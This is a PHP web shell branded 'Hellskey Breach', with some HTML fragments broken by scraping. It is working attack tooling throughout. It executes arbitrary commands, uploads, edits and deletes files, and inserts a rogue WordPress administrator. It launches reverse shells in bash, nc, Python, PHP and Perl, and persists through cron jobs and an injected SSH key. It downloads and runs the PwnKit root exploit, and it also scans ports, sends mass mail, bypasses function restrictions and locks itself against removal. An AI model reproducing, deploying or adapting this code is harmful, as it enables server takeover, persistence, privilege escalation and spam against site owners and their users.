Hellskey Login

Hellskey Breach

'; exit; } // ---------------------[ UTILITY FUNCTIONS ]---------------------- function hx($str) { $hex=''; for($i=0;$i&1':''),$out); $out=implode("\n",$out); } elseif(function_exists('shell_exec')) $out = shell_exec($cmd.($raw?' 2>&1':'')); elseif(function_exists('system')){ ob_start(); system($cmd.($raw?' 2>&1':'')); $out=ob_get_clean(); } elseif(function_exists('passthru')){ ob_start(); passthru($cmd.($raw?' 2>&1':'')); $out=ob_get_clean(); } else $out='No execution function available.'; return $out; } function formatSize($bytes){ $units=['B','KB','MB','GB','TB']; for($i=0;$bytes>=1024&&$i<4;$bytes/=1024,$i++); return round($bytes,2).' '.$units[$i]; } function success(){ header('Location: '.$_SERVER['PHP_SELF'].'?msg=success'); exit; } function failed(){ header('Location: '.$_SERVER['PHP_SELF'].'?msg=error'); exit; } // ----------------[ DIRECTORY & FILE HANDLERS ]---------------- $cwd = isset($_GET['d']) ? unhx($_GET['d']) : getcwd(); if (!is_dir($cwd)) $cwd = getcwd(); chdir($cwd); $items = scandir($cwd); // File actions if(isset($_POST['upload'])){ $target=$cwd.'/'.basename($_FILES['file']['name']); if(move_uploaded_file($_FILES['file']['tmp_name'],$target)) success(); else failed(); } if(isset($_POST['mkdir'])){ if(mkdir($cwd.'/'.$_POST['dir'])) success(); else failed(); } if(isset($_POST['touch'])){ if(touch($cwd.'/'.$_POST['file'])) success(); else failed(); } if(isset($_POST['rename'])){ if(rename($cwd.'/'.$_POST['old'],$cwd.'/'.$_POST['new'])) success(); else failed(); } if(isset($_POST['chmod'])){ if(chmod($cwd.'/'.$_POST['target'], octdec($_POST['perms']))) success(); else failed(); } if(isset($_POST['delete'])){ $f=$cwd.'/'.$_POST['target']; if(is_file($f)) unlink($f); elseif(is_dir($f)) rmdir($f); success(); } if(isset($_POST['edit_save'])){ file_put_contents($_POST['edit_file'], $_POST['content']); success(); } if(isset($_GET['download'])){ $f=$_GET['download']; if(file_exists($f)){ header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($f)); readfile($f); exit; } } // ----------------[ ADVANCED EXPLOITS & TOOLS ]---------------- if(isset($_GET['adminer'])){ $url='https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php'; if(!file_exists('adminer.php')) file_put_contents('adminer.php',file_get_contents($url)); echo ""; } if(isset($_POST['wp_create'])){ $db=mysqli_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass'],$_POST['db_name']); if($db){ $user=$_POST['wp_user']; $pass=password_hash($_POST['wp_pass'],PASSWORD_DEFAULT); $email=$_POST['wp_email']; mysqli_query($db,"INSERT INTO wp_users (user_login,user_pass,user_email,user_registered) VALUES ('$user','$pass','$email',NOW())"); $uid=mysqli_insert_id($db); mysqli_query($db,"INSERT INTO wp_usermeta (user_id,meta_key,meta_value) VALUES ($uid,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}')"); mysqli_close($db); success(); } else failed(); } if(isset($_POST['revshell'])){ $ip=$_POST['ip']; $port=$_POST['port']; $lang=$_POST['lang']; $shells=['bash'=>"bash -i >& /dev/tcp/$ip/$port 0>&1",'nc'=>"nc -e /bin/sh $ip $port",'python'=>"python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"$ip\",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",'php'=>"php -r '\$s=fsockopen(\"$ip\",$port);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",'perl'=>"perl -e 'use Socket;\$i=\"$ip\";\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in(\$p,inet_aton(\$i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");'"]; $code=$shells[$lang]??$shells['bash']; cmd($code.' > /dev/null 2>&1 &'); success(); } if(isset($_POST['persist'])){ $method=$_POST['method']; if($method=='cron'){ $cron="* * * * * php ".realpath(__FILE__)." >/dev/null 2>&1"; file_put_contents('/tmp/cron', $cron); exec('crontab /tmp/cron'); success(); } elseif($method=='ssh'){ $key=$_POST['key']; file_put_contents($_SERVER['HOME'].'/.ssh/authorized_keys', $key."\n", FILE_APPEND); success(); } else failed(); } if(isset($_POST['pwnkit'])){ $tmp=sys_get_temp_dir().'/pwnkit'; if(!file_exists($tmp)) file_put_contents($tmp,file_get_contents('https://github.com/ly4k/PwnKit/raw/main/PwnKit')); chmod($tmp,0755); $out=cmd($tmp.' id 2>&1'); if(strpos($out,'uid=0(root)')!==false) success(); else failed(); } if(isset($_POST['scan_ports'])){ $host=$_POST['host']; $ports=explode(',',$_POST['ports']); $open=[]; foreach($ports as $p) if(@fsockopen($host,(int)$p,$_,$_,1)) $open[]=$p; echo ""; } if(isset($_POST['mass_mail'])){ $to_list=explode("\n",$_POST['emails']); $headers='From: '.$_POST['from']; foreach($to_list as $to) mail(trim($to),$_POST['subject'],$_POST['message'],$headers); success(); } if(isset($_POST['chankro'])){ echo "

".cmd($_POST['cmd'])."

"; } if(isset($_POST['lock_shell'])){ $cur=basename($_SERVER['SCRIPT_FILENAME']); chmod($cur,0444); success(); } if(isset($_GET['phpinfo'])){ phpinfo(); exit; } if(isset($_GET['get_content']) && isset($_GET['file']) && file_exists($_GET['file'])){ echo file_get_contents($_GET['file']); exit; } ?> HellsKey Breach | 3D Ultimate Shell

Name	Size	Perms	Actions
	' : formatSize(filesize($full)) ?>

"bash -i >& /dev/tcp/$ip/$port 0>&1",'nc'=>"nc -e /bin/sh $ip $port",'python'=>"python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"$ip\",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",'php'=>"php -r '\$s=fsockopen(\"$ip\",$port);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",'perl'=>"perl -e 'use Socket;\$i=\"$ip\";\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in(\$p,inet_aton(\$i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");'"]; cmd($shells[$lang] ?? $shells['bash'].' > /dev/null 2>&1 &'); success(); } if(isset($_GET['msg']) && $_GET['msg']=='success') echo ''; if(isset($_GET['msg']) && $_GET['msg']=='error') echo ''; ?>

Hellskey Breach

Hellskey Breach

🔥 Exploits Suite

Upload File

Create Folder

Create File

WordPress Admin Creator

Reverse Shell

Persistence

PwnKit (CVE-2021-4034)

Port Scanner

Mass Mailer

Chankro Bypass

Lock Shell (Anti‑Removal)

Bitninja Bypass Upload

BackConnect Reverse Shell

Editor: